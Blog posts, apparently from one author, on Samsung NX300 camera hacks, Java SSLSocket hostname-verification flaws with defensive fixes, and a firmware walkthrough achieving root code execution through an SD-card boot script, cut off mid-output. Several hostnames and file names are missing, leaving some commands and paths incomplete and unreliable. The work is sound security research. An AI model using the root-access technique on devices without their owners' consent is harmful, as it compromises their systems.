Markus A. Kuppe has written a tutorial for auto-backups of the NX300 using an ftp client on the camera and a Raspberry Pi ftp server. One interesting bit of information is how to make the camera auto-connect to WiFi whenever it is turned on, using a custom wpa_supplicant.conf and DBus:

cp /mnt/mmc/wpa_supplicant.conf /tmp/
/usr/bin/wlan.sh start NL 0x8210
/usr/sbin/connmand -W nl80211 -r
sleep 2
dbus-send --system --type=method_call --print-reply --dest=net.connman \
    /net/connman/service/wifi_a0219572b25b_7777772e6c656d6d737465722e6465_managed_psk \
    net.connman.Service.Connect

Jonathan Dieter created another backup mechanism using SCP and published the nx300m-autobackup source code. Well done!

Additional Kernel Modules

Markus also provided a short write-up on compiling additional kernel modules, which should allow us to extend the camera's functionality without re-flashing the firmware.

Crypto Photography

The most interesting idea, however, was envisioned by Doug Hickok. He modified the firmware to auto-encrypt photographs using public key cryptography. This allows for very interesting use cases like letting a professional photographer take pictures without allowing him to keep a copy, or for investigative journalists to hide their data tracks.

In the current implementation the pictures are first stored to the SD card and then encrypted and deleted, allowing for undelete attacks. Do not use it in production yet. With some more tweaking, however, it should be possible to make this firmware actually deliver the security promise.

Announcement: Samsung NX Hacks

Seeing how there is a (yet small) community of tinkerers around the NX300 camera, and with the knowledge that a whole range of Samsung NX cameras comes with Tizen-based firmware (NX1, NX200, NX2000, NX300M, ...?), the author has created a repository and a Wiki on GitHub.

Feel free to contribute to the wiki or the project - every input is welcome, ranging from transferring information from the blog posts linked above into a more structured form in the wiki, up to creating firmware modifications that allow for exciting new features.

Hack on!


Posted 2015-01-29 17:30:20

Internet security is hard. TLS is almost impossible. Implementing TLS correctly in Java is a nightmare! While the higher-level HttpsURLConnection and Apache's DefaultHttpClient do it (mostly) right, direct users of Java SSL sockets (SSLSocket/SSLEngine, SSLSocketFactory) are left exposed to Man-in-the-Middle attacks, unless the application manually checks the hostname against the certificate or employs certificate pinning.

The SSLSocket documentation claims that the socket provides "Integrity Protection", "Authentication", and "Confidentiality", even against active wiretappers. That impression is underscored by the rigorous certificate checking performed when connecting, making it ridiculously hard to run development/test installations. However, these checks turn out to be completely worthless against active MitM attackers, because SSLSocket will happily accept any valid certificate (like one for a domain owned by the attacker). Due to this, many applications using SSLSocket can be attacked with little effort.

This problem has been written about, but CVE-2014-5075 shows that it can not be stressed enough.

Affected Applications

This problem affects applications that make use of SSL/TLS, but not HTTPS. The best candidates to look for it are therefore clients for application-level protocols like e-mail (POP3/IMAP), instant messaging (XMPP), or file transfer (FTP). CVE-2014-5075 is the respective vulnerability of the Smack XMPP client library, so this is a good starting point.

XMPP Clients

XMPP clients based on Smack (which was fixed on 2014-07-22) were affected, as were a number of other XMPP clients.

Not Vulnerable Applications

The following applications have been checked as well, and contained code to compensate for SSLSocket's shortcomings:

  • Jitsi (OSS conferencing client)
  • K9-Mail (Android e-Mail client)
  • Xabber (Based on Smack, but using its own hostname verification)

Background: Security APIs in Java

The number of vulnerable applications can be easily explained after a deep dive into the security APIs provided by Java (and its offspring). Therefore, this section will cover the dirty details of trust (mis)management in the most important implementations: old Java, new Java, Android, and Apache's HttpClient.

Java SE up to and including 1.6

When network security was added into Java 1.4 with the JSSE (and we all know how well security-as-an-afterthought works), two distinct APIs have been created for certificate verification and for hostname verification. The rationale for that decision was probably that the TLS/SSL handshake happens at the socket layer, whereas the hostname verification depends on the application-level protocol (HTTPS at that time). Therefore, the X509TrustManager class for certificate trust checks was integrated into the low-level SSLSocket and SSLEngine classes, whereas the HostnameVerifier API was only incorporated into the HttpsURLConnection.

The API design was not very future-proof either: X509TrustManager's checkClientTrusted() and checkServerTrusted() methods are only passed the certificate and authentication type parameters. There is no reference to the actual SSL connection or its peer name. The only workaround to allow hostname verification through this API is by creating a custom TrustManager for each connection, and storing the peer's hostname in it. This is neither elegant nor does it scale well with multiple connections.
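A rough sketch of that workaround (the class and its name are hypothetical, not a JDK API; the actual name matching is delegated here to Apache's StrictHostnameVerifier, which is introduced below):

import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import javax.net.ssl.SSLException;
import javax.net.ssl.X509TrustManager;
import org.apache.http.conn.ssl.StrictHostnameVerifier;

// one instance per connection: the expected peer name is fixed at creation time
class HostnameBindingTrustManager implements X509TrustManager {
    private final X509TrustManager delegate; // performs the actual chain validation
    private final String hostname;           // the peer we expect to talk to

    HostnameBindingTrustManager(X509TrustManager delegate, String hostname) {
        this.delegate = delegate;
        this.hostname = hostname;
    }

    public void checkClientTrusted(X509Certificate[] chain, String authType)
            throws CertificateException {
        delegate.checkClientTrusted(chain, authType);
    }

    public void checkServerTrusted(X509Certificate[] chain, String authType)
            throws CertificateException {
        delegate.checkServerTrusted(chain, authType); // certificate chain first
        try { // then match the end-entity certificate against the stored name
            new StrictHostnameVerifier().verify(hostname, chain[0]);
        } catch (SSLException e) {
            throw new CertificateException(e.getMessage());
        }
    }

    public X509Certificate[] getAcceptedIssuers() {
        return delegate.getAcceptedIssuers();
    }
}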

The HostnameVerifier on the other hand has access to both the hostname and the session, making a full verification possible. However, only HttpsURLConnection is making use of a HostnameVerifier (and is only asking it if it determines a mismatch between the peer and its certificate, so the default HostnameVerifier always fails).

Besides the default HostnameVerifier being unusable due to always failing, the API has another subtle surprise: while the TrustManager methods fail by throwing a CertificateException, HostnameVerifier.verify() simply returns false if verification fails.

As the API designers realized that users of the raw SSLSocket might fall into a certificate verification trap set up by their API, they added a well-buried warning into the JSSE reference guide for Java 5, which I am sure you have read multiple times (or at least printed it and put it under your pillow):

IMPORTANT NOTE: When using raw SSLSockets/SSLEngines you should always check the peer's credentials before sending any data. The SSLSocket/SSLEngine classes do not automatically verify, for example, that the hostname in a URL matches the hostname in the peer's credentials. An application could be exploited with URL spoofing if the hostname is not verified.

Of course, URLs are only a thing in HTTPS, but you get the point... provided that you actually have read the reference guide... up to this place. If you only read the SSLSocket marketing reference article, and thought that you are safe because it does not mention any of the pitfalls: shame on you!

And even if you did read the warning, there is no hint about how to implement the peer credentials checks. There is no API class that would perform this tedious and error-prone task, and implementing it yourself requires a Ph.D. degree in rocket surgery, as well as deep knowledge of some related Internet standards*.

* Side note: even if you do not believe SSL conspiracy theories, or the confirmed facts about the deliberate manipulation of Internet standards by the NSA and GCHQ, there is one prominent example of how the implementation of security mechanisms can be aggravated by adding complexity - the title of RFC 6125: "Representation and Verification of Domain-Based Application Service Identity within Internet Public Key Infrastructure Using X.509 (PKIX) Certificates in the Context of Transport Layer Security (TLS)".

Apache HttpClient

The Apache HttpClient library is a full-featured HTTP client written in pure Java, adding flexibility and functionality in comparison to the default HTTP implementation.

The Apache library developers came up with their own API interface for hostname verification, X509HostnameVerifier, that also happens to incorporate Java's HostnameVerifier interface. The new methods added by Apache are expected to throw SSLException when verification fails, while the old method still returns true or false, of course. It is hard to tell if this interface mixing is adding confusion, or reducing it. One way or the other, it results in the appropriate glue code:

public final boolean verify(String host, SSLSession session) {
    try {
        Certificate[] certs = session.getPeerCertificates();
        X509Certificate x509 = (X509Certificate) certs[0];
        verify(host, x509);
        return true;
    } catch (SSLException e) {
        return false;
    }
}
Based on that interface, AllowAllHostnameVerifier, BrowserCompatHostnameVerifier, and StrictHostnameVerifier were created, which can actually be plugged into anything expecting a plain HostnameVerifier. The latter two also actually perform hostname verification, as opposed to the default verifier in Java, so they can be used wherever appropriate. Their difference is:

The only difference between BROWSER_COMPATIBLE and STRICT is that a wildcard (such as "*.foo.com") with BROWSER_COMPATIBLE matches all subdomains, including "a.b.foo.com".

If you can make use of Apache's HttpClient library, just plug in one of these verifiers and have a happy life:

sslSocket = ...;
HostnameVerifier verifier = new StrictHostnameVerifier();
if (!verifier.verify(serviceName, sslSocket.getSession())) {
    throw new CertificateException("Server failed to authenticate as " + serviceName);
}
// NOW you can send and receive data!

Android
Android's designers must have been well aware of the shortcomings of the Java implementation, and the problems that an application developer might encounter when testing and debugging. They created the SSLCertificateSocketFactory class, which makes a developer's life really easy:

  1. It is available on all Android devices, starting with API level 1.

  2. It comes with appropriate warnings about its security parameters and limitations:

    Most SSLSocketFactory implementations do not verify the server's identity, allowing man-in-the-middle attacks. This implementation does check the server's certificate hostname, but only for createSocket variants that specify a hostname. When using methods that use InetAddress or which return an unconnected socket, you MUST verify the server's identity yourself to ensure a secure connection.

  3. It provides developers with two easy ways to disable all security checks for testing purposes: a) a static getInsecure() method (as of API level 8), and b)

    On development devices, "setprop socket.relaxsslcheck yes" bypasses all SSL certificate and hostname checks for testing purposes. This setting requires root access.

  4. Uses of the insecure instance are logged via adb:

    Bypassing SSL security checks at caller's request

    Or, when the system property is set:

    *** BYPASSING SSL SECURITY CHECKS (socket.relaxsslcheck=yes) ***
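For comparison, the secure path is almost a one-liner. A minimal sketch (the host name and timeout value are illustrative; createSocket(String, int) is the hostname-verifying variant mentioned in the warning above):

SocketFactory sf = SSLCertificateSocketFactory.getDefault(10000 /* handshake timeout, ms */);
SSLSocket socket = (SSLSocket) sf.createSocket("xmpp.example.com", 5223); // name is verified here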

Some time in 2013, a training article about Security with HTTPS and SSL was added, which also features its own section for "Warnings About Using SSLSocket Directly", once again explicitly warning the developer:

Caution: SSLSocket does not perform hostname verification. It is up the your app to do its own hostname verification, preferably by calling getDefaultHostnameVerifier() with the expected hostname. Further beware that HostnameVerifier.verify() doesn't throw an exception on error but instead returns a boolean result that you must explicitly check.

Typos aside, this is very true advice. The article also covers other common SSL/TLS related problems like certificate chaining, self-signed certs and SNI. A must read! The fact that it does not mention the SSLCertificateSocketFactory is only a little snag.
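Following that advice, a manual check right after the handshake might look like this (a sketch for Android, where the default verifier performs real checks, unlike the desktop Java default discussed above; the host name is illustrative):

SSLSocket sslSocket = (SSLSocket) sslContext.getSocketFactory()
        .createSocket("xmpp.example.com", 5222);
sslSocket.startHandshake();
HostnameVerifier hv = HttpsURLConnection.getDefaultHostnameVerifier();
if (!hv.verify("xmpp.example.com", sslSocket.getSession())) {
    throw new SSLHandshakeException("Expected xmpp.example.com, got " +
            sslSocket.getSession().getPeerPrincipal());
}
// NOW you can send and receive data!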

Java 1.7+

As of Java 1.7, there is a new abstract class X509ExtendedTrustManager that finally unifies the two sides of certificate verification:

Extensions to the X509TrustManager interface to support SSL/TLS connection sensitive trust management.

To prevent man-in-the-middle attacks, hostname checks can be done to verify that the hostname in an end-entity certificate matches the targeted hostname. TLS does not require such checks, but some protocols over TLS (such as HTTPS) do. In earlier versions of the JDK, the certificate chain checks were done at the SSL/TLS layer, and the hostname verification checks were done at the layer over TLS. This class allows for the checking to be done during a single call to this class.

This class extends the checkServerTrusted and checkClientTrusted methods with an additional parameter for the socket reference, allowing the TrustManager to obtain the hostname that was used for the connection, thus making it possible to actually verify that hostname.

To retrofit this into the old X509TrustManager interface, all instances of X509TrustManager are internally wrapped into an AbstractTrustManagerWrapper that performs hostname verification according to the socket's SSLParameters. All this happens transparently, all you need to do is to initialize your socket with the hostname and then set the right params:

SSLParameters p = sslSocket.getSSLParameters();
p.setEndpointIdentificationAlgorithm("HTTPS");
sslSocket.setSSLParameters(p);

If you do not set the endpoint identification algorithm, the socket will behave in the same way as in earlier versions of Java, accepting any valid certificate.

However, if you do run the above code, the certificate will be checked against the IP address or hostname that you are connecting to. If the service you are using employs DNS SRV, the hostname (the actual machine you are connecting to, e.g. "") might differ from the service name (what the user entered, like ""). However, the certificate will be issued for the service name, so the verification will fail. As such protocols are most often combined with STARTTLS, you will need to wrap your SSLSocket around your plain Socket, for which you can use the following code:

sslSocket = sslContext.getSocketFactory().createSocket(
        plainSocket,
        serviceName, /**< set your service name here */
        plainSocket.getPort(),
        true);
// set the socket parameters here!

API Confusion Conclusion

To summarize the different "platforms":

  • If you are on Java 1.6 or earlier, you are screwed!
  • If you have Android, use SSLCertificateSocketFactory and be happy.
  • If you have Apache HttpClient, add a StrictHostnameVerifier.verify() call right after you connect your socket, and check its return value!
  • If you are on Java 1.7 or newer, do not forget to set the right SSLParameters, or you might still be screwed.

Java SSL In the Literature

There is a large amount of good and bad advice out there, you just need to be a farmer security expert to separate the wheat from the chaff.

Negative Examples

The most expensive advice is free advice. And the Internet is full of it. First, there is code to let Java trust all certificates, because self-signed certificates are a subset of all certificates, obviously. Then, we have a software engineer deliberately disabling certificate validation, because all these security exceptions only get in our way. Even after the Snowden revelations, recipes for disabling SSL certificate validation are still being written. The suggestions are all very similar, and all pretty bad.

Admittedly, an encrypted but unvalidated connection is still a little bit better than a plaintext connection. However, with the advent of free WiFi networks and SSL MitM software, everybody with a little energy can invade your "secure" connections, which you use to transmit really sensitive information. The effect of this can range from funny through embarrassing to life-threatening, if you are a journalist in a crisis zone.

The personal favorite of the author is this SO question about avoiding the certificate warning message in yaxim, which is caused by MemorizingTrustManager. It is especially amusing how the server's domain name is left intact in the screenshot, whereas the certificate checksums and the self-signed indication are blackened.

Fortunately, the situation on StackOverflow has been improving over the years. Some time ago, you were overwhelmed with DO_NOT_VERIFY HostnameVerifiers and all-accepting DefaultTrustManagers, where the authors conveniently forgot to mention that their code turns the big red "security" switch to OFF.

The better answers on StackOverflow at least come with a warning or even suggest certificate pinning.

Positive Examples

In 2012, Kevin Locke created a proper HostnameVerifier using the internal sun.security.util.HostnameChecker class, which seems to exist in Java SE 6 and 7. This HostnameVerifier is used with AsyncHttpClient, but is suitable for other use-cases as well.

Fahl et al. analyzed the sad state of SSL in Android apps in 2012. Their focus was on HTTPS, where they found a massive number of applications deliberately misconfigured to accept invalid or mismatching certificates (probably added during app development). In a 2013 follow-up, they developed a mechanism to enable certificate checking and pinning according to special flags in the application manifest.

Will Sargent from Terse Systems has an excellent series of articles on everything TLS, with videos, examples and plentiful background information. ABSOLUTELY MUST SEE!

There is even an excellent StackOverflow answer by Bruno, outlining the proper hostname validation options with Java 7, Android and "other" Java platforms, in a very concise way.

Mitigation Possibilities

So you are an app developer, and you get this pesky CertificateException you could not care less about. What can you do to get rid of it, in a secure way? That depends on your situation.

Cloud-Connected App: Certificate Pinning

If your app is always connecting to known-in-advance servers under your control (like only your company's "cloud"), employ Certificate Pinning.

If you want a cheap and secure solution, create your own Certificate Authority (CA) (and guard its keys!), deploy its certificate as the only trusted CA in the app, and sign all your server keys with it. This approach provides you with the ultimate control over the whole security infrastructure, you do not need to pay certificate extortion fees to greedy CAs, and a compromised CA can not issue certificates that would allow to MitM your app. The only drawback is that you might not be as good as a commercial CA at guarding your CA keys, and these are the keys to your kingdom.

To implement the client side, you need to store the CA cert in a key file, which you can use to create an X509TrustManager that will only accept server certificates signed by your CA:

KeyStore ks = KeyStore.getInstance(KeyStore.getDefaultType());
ks.load(new FileInputStream(keyStoreFile), "keyStorePassword".toCharArray());
TrustManagerFactory tmf = TrustManagerFactory.getInstance("X509");
tmf.init(ks);
SSLContext sc = SSLContext.getInstance("TLS");
sc.init(null, tmf.getTrustManagers(), new java.security.SecureRandom());
// use 'sc' for your HttpsURLConnection / SSLSocketFactory / ...

If you rather prefer to trust the establishment (or if your servers are to be used by web browsers as well), you need to get all your server keys signed by an "official" Root CA. However, you can still store that single CA into your key file and use the above code. You just won't be able to switch to a different CA later on if they try to extort more money from you.

User-configurable Servers (a.k.a. "Private Cloud"): TOFU/POP

In the context of TLS, TOFU/POP is neither vegetarian music nor frozen food, but stands for "Trust on First Use / Persistence of Pseudonymity".

The idea behind TOFU/POP is that when you connect to a server for the first time, your client stores its certificate, and checks it on each subsequent connection. This is the same mechanism as used in SSH. If you had no evildoers between you and the server the first time, later MitM attempts will be discovered. OpenSSH displays the following on a key change:

Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.

In case you fell victim to a MitM attack the first time you connected, you will see the nasty warning as soon as the attacker goes away, and can start investigating. Your information will be compromised, but at least you will know it.

The problem with the TOFU approach is that it does not mix well with the PKI infrastructure model used in the TLS world: with TOFU, you create one key when the server is configured for the first time, and that key remains bound to the server forever (there is no concept of key revocation).

With PKI, you create a key and request a certificate, which is typically valid for one or two years. Before that certificate expires, you must request a new certificate (optionally using a new private key), and replace the expiring certificate on the server with the new one.

If you let an application "pin" the TLS certificate on first use, you are in for a surprise within the next year or two. If you "pin" the server public key, you must be aware that you will have to stick to that key (and renew certificates for it) forever. Of course you can create your own, self-signed, certificate with a ridiculously long expiration time, but this practice is frowned upon (for self-signing and long expiration times).

Currently, some ideas exist about how to combine PKI with TOFU, but for now the only sensible thing an app can do is shrug and ask the user.

Because asking the user is non-trivial from a background networking thread, the author has developed MemorizingTrustManager (MTM) for Android. MTM is a library that can be plugged into your app's TLS connections. It leverages the system's certificate and hostname verification, and asks the user if the system does not consider a given certificate/hostname combination legitimate. Internally, MTM uses a key store in which it collects all the certificates that the user has permanently accepted.
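
Wiring MTM into an SSLContext looks roughly like this (based on the library's documented usage; 'context' is assumed to be your Android Activity or Service):

import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.X509TrustManager;
import de.duenndns.ssl.MemorizingTrustManager;

SSLContext sc = SSLContext.getInstance("TLS");
MemorizingTrustManager mtm = new MemorizingTrustManager(context);
sc.init(null, new X509TrustManager[] { mtm }, new java.security.SecureRandom());
HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());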


If you are developing a browser that is meant to support HTTPS, please stop here, get a security expert into your team, and only go on with her. This article has shown that using TLS is horribly hard even if you can leverage existing components to perform the actual verification of certificates and hostnames. Writing such checks in a browser-compliant way is far beyond the scope of this piece.



Besides TOFU/POP, which is not yet ready for TLS primetime, there is an alternative approach to link the server name (in DNS) with the server identity (as represented by its TLS certificate): DNS-based Authentication of Named Entities (DANE).

With this approach, information about the server's TLS certificate can be added to the DNS database, in the form of different certificate constraint records:

  • (0) a CA constraint can require that the presented server certificate MUST be signed by the referenced CA public key, and that this CA must be a known Root CA.
  • (1) a service certificate constraint can define that the server MUST present the referenced certificate, and that certificate must be signed by a known Root CA.
  • (2) a trust anchor assertion is like a CA constraint, except it does not need to be a Root CA known to the client. This allows a server administrator to run their own CA.
  • (3) a domain issued certificate is analogous to a service certificate constraint, but like in (2), there is no need to involve a Root CA.

Multiple constraints can be specified to tighten the checks, encoded in TLSA records ("TLS association"). TLSA records are always specific to a given server name and port. For example, to make a secure XMPP connection, first the XMPP SRV record (_xmpp-client._tcp) for the target domain needs to be obtained:

$ host -t SRV has SRV record 0 0 5222

Then, the TLSA record(s) for the resulting host and port must be obtained:

$ host -t TLSA has TLSA record 3 0 1 75E6A12CFE74A2230F3578D5E98C6F251AE2043EDEBA09F9D952A4C1 C317D81D

This record reads as follows: the server uses a domain issued certificate (3), with the full certificate (0) represented via its SHA-256 hash (1): 75:E6:A1:2C:FE:74:A2:23:0F:35:78:D5:E9:8C:6F:25:1A:E2:04:3E:DE:BA:09:F9:D9:52:A4:C1:C3:17:D8:1D.

And indeed, if we check the server certificate using openssl s_client, the SHA-256 hash does match:

Issuer: O=Root CA, OU=, CN=CA Cert Signing Authority/
    Not Before: Apr  8 07:25:35 2014 GMT
    Not After : Oct  5 07:25:35 2014 GMT
SHA256 Fingerprint=75:E6:A1:2C:FE:74:A2:23:0F:35:78:D5:E9:8C:6F:25:1A:E2:04:3E:DE:BA:09:F9:D9:52:A4:C1:C3:17:D8:1D

Of course, this information can only be relied upon if the DNS records are secured by DNSSEC. And DNSSEC can be abused by the same entities that can already manipulate Root CAs and perform large-scale Man-in-the-Middle attacks. However, this kind of attack becomes significantly harder: a typical Root CA list contains hundreds of entries, each with an unknown number of intermediate CAs, and it is sufficient to compromise any one of them to screw you. With DNSSEC, the attacker needs to obtain the keys to your own domain, to your top-level domain (.net) or to the master root keys (.). In addition to that improvement, another benefit of DANE is that server operators can replace (paid) Root CA services with (cheaper/free) DNS records.

However, there is a long way to go before DANE can be used in Java. Java's own DNS code is very limited (no SRV support; TLSA - what are you dreaming of?). The dnsjava library claims to provide partial DNSSEC verification, there is the unmaintained DNSSEC4j, and the GSoC work-in-progress dnssecjava. All that remains is for somebody to step up and implement a DANETrustManager based on one of these components.
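
To illustrate the missing piece, here is a hypothetical sketch of the certificate-matching half of such a DANETrustManager, covering only the "3 0 1" case from above (domain issued certificate, full certificate, SHA-256). The DNSSEC-validated TLSA lookup that would supply the hash is exactly the part one of the above libraries needs to provide:

import java.security.MessageDigest;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import java.util.Arrays;
import javax.net.ssl.X509TrustManager;

public class DaneTrustManagerSketch implements X509TrustManager {
    private final byte[] tlsaHash; // data from the "3 0 1" TLSA record

    public DaneTrustManagerSketch(byte[] tlsaHash) {
        this.tlsaHash = tlsaHash;
    }

    public void checkServerTrusted(X509Certificate[] chain, String authType)
            throws CertificateException {
        try {
            // compare the SHA-256 hash of the presented certificate to the TLSA data
            byte[] hash = MessageDigest.getInstance("SHA-256").digest(chain[0].getEncoded());
            if (!Arrays.equals(hash, tlsaHash))
                throw new CertificateException("server certificate does not match TLSA record");
        } catch (java.security.NoSuchAlgorithmException e) {
            throw new CertificateException(e);
        }
    }

    public void checkClientTrusted(X509Certificate[] chain, String authType)
            throws CertificateException {
        throw new CertificateException("client certificates are not checked here");
    }

    public X509Certificate[] getAcceptedIssuers() {
        return new X509Certificate[0];
    }
}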


Internet security is hard. Let's go bake some cookies!

Comments on HN

Posted 2014-08-05 19:52:00 Tags:

This is the second post in a series covering the Samsung NX300 "Smart" Camera. In the first post, we analyzed how the camera interacts with the outside world using NFC and WiFi. In this post, we will take a deeper look at the operating system running on the camera, execute some code and open a remote root shell. This process can be applied (with some adaptations) to different networked consumer electronics, including home routers, NAS boxes and Smart TVs. The third post will leverage that knowledge to add functionality.

Firmware: Looking for Loopholes

Experience shows that most firmware images provide an easy way to run a user-provided shell script on boot. This feature is often added by the "software engineers" during development, but it boils down to a local root backdoor. On a camera, the SD card would be a good place to search. Other devices might execute code from a USB flash drive or the built-in hard disk.

Usually, we have to start with the firmware update file (nx300.bin from this 241MB ZIP in our case), run binwalk on it, extract and mount the root file system and have our fun. In this case, however, the source archive from Samsung's OSS Release Center contains an unpacked root file system tree in TIZEN/project/NX300/image/rootfs, so we just examine that:

georg@megavolt:TIZEN/project/NX300/image/rootfs$ ls -l
total 72
drwxr-xr-x  4 4096 Oct 16  2013 bin/
drwxr-xr-x  3 4096 Oct 16  2013 data/
drwxr-xr-x  3 4096 Oct 16  2013 dev/
drwxr-xr-x 38 4096 Oct 16  2013 etc/
drwxr-xr-x  9 4096 Oct 16  2013 lib/
-rw-r--r--  1  203 Oct 16  2013 make_image.log
drwxr-xr-x  8 4096 Oct 16  2013 mnt/
drwxr-xr-x  3 4096 Oct 16  2013 network/
drwxr-xr-x 16 4096 Oct 16  2013 opt/
drwxr-xr-x  2 4096 Oct 16  2013 proc/
lrwxrwxrwx  1   13 Oct 16  2013 root -> opt/home/root/
drwxr-xr-x  2 4096 Oct 16  2013 sbin/
lrwxrwxrwx  1    8 Oct 16  2013 sdcard -> /mnt/mmc
drwxr-xr-x  2 4096 Oct 16  2013 srv/
drwxr-xr-x  2 4096 Oct 16  2013 sys/
drwxr-xr-x  2 4096 Oct 16  2013 tmp/
drwxr-xr-x 16 4096 Oct 16  2013 usr/
drwxr-xr-x 13 4096 Oct 16  2013 var/

make_image.log sounds like somebody forgot to clean up before shipping (this file is actually contained on the camera):

SBS logging begin
Wed Oct 16 14:27:21 KST 2013

WARNING: setting root UBIFS inode UID=GID=0 (root) and permissions to u+rwx,go+rx; use --squash-rino-perm or --nosquash-rino-perm to suppress this warning

If we can believe the /sdcard symlink, the SD card is mounted at /mnt/mmc. Usually, there are some scripts and tools referencing the directory, and we should start with them:

georg@megavolt:TIZEN/project/NX300/image/rootfs$ grep /mnt/mmc -r .
./etc/fstab:/dev/mmcblk0    /mnt/mmc        exfat   noauto,user,umask=1000 0 0
./etc/fstab:/dev/mmcblk0p1  /mnt/mmc        exfat   noauto,user,umask=1000 0 0
./usr/sbin/ /oldroot/mnt/mmc
./usr/sbin/rcS.pivot:   mkdir -p /mnt/mmc
./usr/sbin/rcS.pivot:       mount -t vfat -o noatime,nodiratime $card_path /mnt/mmc
./usr/bin/    mount -t vfat /dev/mmcblk0 /mnt/mmc
./usr/bin/    mount -t vfat /dev/mmcblk0p1 /mnt/mmc
./usr/bin/ -t vfat /dev/mmcblk0p1 /mnt/mmc   
./usr/bin/ /mnt/mmc -name "*$1*.deb" -exec dpkg -i {} \; 2> /dev/null
./usr/bin/ -t vfat /dev/mmcblk0p1 /mnt/mmc
./usr/bin/ /mnt/mmc
./usr/bin/   nr_mnt_dev=`/usr/bin/stat -c %d /mnt/mmc` #/opt/storage
./usr/bin/       umount /mnt/mmc 2> /dev/null
./usr/bin/           /bin/mount -t vfat /dev/mmcblk${i}p1 /mnt/mmc -o uid=0,gid=0,dmask=0000,fmask=0000,iocharset=iso8859-1,utf8,shortname=mixed
./usr/bin/               /bin/mount -t vfat /dev/mmcblk${i} /mnt/mmc -o uid=0,gid=0,dmask=0000,fmask=0000,iocharset=iso8859-1,utf8,shortname=mixed
[ stripped a bunch of binary matches in /usr/bin and /usr/lib ]

What we have here are the usual Linux boot-up configuration files (fstab, rcS.pivot), a very interesting script that installs any Debian packages from the SD card, and ~50 shared libraries and executable binaries with the /mnt/mmc string hardcoded inside.

Package Installer Script

Let us have a look at the installer script first:

#! /bin/sh

echo $1
if [ "$#" = "2" ]; then
    if [ "$2" = "0" ]; then
        echo -e "mount mmcblk0.."
        mount -t vfat /dev/mmcblk0 /mnt/mmc
    else
        echo -e "mount mmcblk0p1..."
        mount -t vfat /dev/mmcblk0p1 /mnt/mmc
    fi
else
    echo -e "mount mmcblk0p1..."
    mount -t vfat /dev/mmcblk0p1 /mnt/mmc
fi

find /mnt/mmc -name "*$1*.deb" -exec dpkg -i {} \; 2> /dev/null

echo -e "sync...."
sync

This is a shell script that takes one or two arguments. The first one is the package name to look for (the find command will find and install all .deb files containing the first argument in their name). The second argument selects which SD card partition (or the whole device) to mount. Surely we can use this script to install dropbear, gcc or moon-buggy. Now we only need to figure out how (or from where) this script is run:

georg@megavolt:TIZEN/project/NX300/image/rootfs$ grep -r .

Whoops. There are no references to it in the firmware. It was merely a red herring, and we need to find another way in.

The Magic Binary Blob

In /usr/bin, the most interesting file is di-camera-app-nx300, making references to /mnt/mmc/Demo/NX300_Demo.mp4, /mnt/mmc/SYSTEM/Device.xml and a bunch of WAV files in /mnt/mmc/sounds/ that seem to correspond to UI actions (up, down, ..., delete, ev, wifi).

This is obviously the magic binary blob controlling the really interesting functions (like the UI, the shutter, and the image processor). Most consumer electronics branded as "Open Source" contain some kind of Linux runtime which is only used to execute one large binary. That binary in turn encloses all the things you want to tinker with, but it is not provided with source code, still leaving you at the mercy of the manufacturer.

As expected, this program comes out of nowhere. There are traces of the di-camera-app-nx300 Debian package (version 0.2.387) being installed:

Package: di-camera-app-nx300
Status: install ok installed
Priority: extra
Section: misc
Installed-Size: 87188
Maintainer: Sookyoung Maeng <[snip]>, Jeounggon Yoo <[snip]>
Architecture: armel
Source: di-camera-app
Version: 0.2.387
Depends: libappcore-common-0, libappcore-efl-0, libaul-1, libbundle-0, libc6 (>= 2.4),
    libdevman-0, libdlog-0, libecore, libecore-evas, libecore-file, libecore-input,
    libecore-x, libedje (>=, libeina (>=,
    libelm, libevas (>=, libgcc1 (>= 1:4.4.0),
    libglib2.0-0 (>= 2.12.0), libmm-camcorder, libmm-player, libmm-sound-0,
    libmm-utility, libnetwork-0, libnl2 (>= 2.0), libslp-pm-0, libslp-utilx-0,
    libstdc++6 (>= 4.5), libvconf-0, libwifi-wolf-client, libx11-6,
    libxrandr2 (>= 2:1.2.0), libxtst6, prefman, libproduction-mode,
    libfilelistmanagement, libmm-common, libmm-photo, libasl, libdcm,
    libcapture-fw-slpcam-nx300, libvideo-player-ext-engine, libhibernation-slpcam-0,
    sys-mmap-manager, libstorage-manager, libstrobe, libdustreduction, libmm-slideshow,
    di-sensor, libdi-network-dlna-api, libproduction-commands, d4library,
Description: Digital Imaging inhouse application for nx300

So this package is created from di-camera-app, which does not exist either, except "inhouse". Thank you Samsung for spoiling the fun... :-(

Besides some start/stop scripts, the only other interesting reference to this magic binary blob is in a script under TIZEN/build/, which looks like a mixture of an installation and a startup script:


cp -f *.so /usr/lib
cp -f di-camera-app-nx300 /usr/bin
sync
sync
sleep 1
cd /
startx; di-camera-app &

(Because with only one sync, you can never know, and two might still not be enough if you must be 300% sure the data has been written).

The camera app is accompanied by another magic binary blob for WiFi, smart-wifi-app-nx300 (Samsung should get an award for creative file names). However, there are no hints at possible code execution in either program, so we need to dig even deeper.

Searching Shared Libraries

The situation in /usr/lib is different, though. We can run strings on the files that mention the SD card mount point (limiting the output to the relevant lines):

georg@megavolt:TIZEN/project/NX300/image/rootfs$ for f in `grep -l /mnt/mmc *.so` ; do \
                echo "--- $f" ; strings $f | grep /mnt/mmc; done
/usr/bin/iozone -A -s 40m -U /mnt/mmc -f /mnt/mmc/test -e > /tmp/card_result.txt
cp /tmp/card_result.txt /mnt/mmc

Okay, this is starting to get hot! The script paths under /mnt/mmc/ are exactly what we have been looking for. We need to try one of them and see what happens!

To test our theory, we need to mount the camera via USB and create the following script in its root directory (Windows users watch out: the file needs Unix line breaks!):

#!/bin/sh
# write everything to a log file on the SD card, so we can read it from the PC
LOG=/mnt/mmc/autoexec.log

date >> $LOG
id >> $LOG
echo "$PATH" >> $LOG
ps axfu >> $LOG
mount >> $LOG

Now we need to unmount the camera, turn it off and on again, wait some seconds, mount it, and check if we got lucky. Let's see... autoexec.log is there! Jackpot! Now we can analyze its contents, piece by piece:

Fri May  9 06:25:20 UTC 2014
uid=0(root) gid=0(root)

This output was just generated, our script was running as root (yeah!), and the PATH looks rather boring.

[stripped boring kernel threads and some columns]
  1    2988    52 Ss    init      
139   11460  1348 S     /usr/bin/system_server
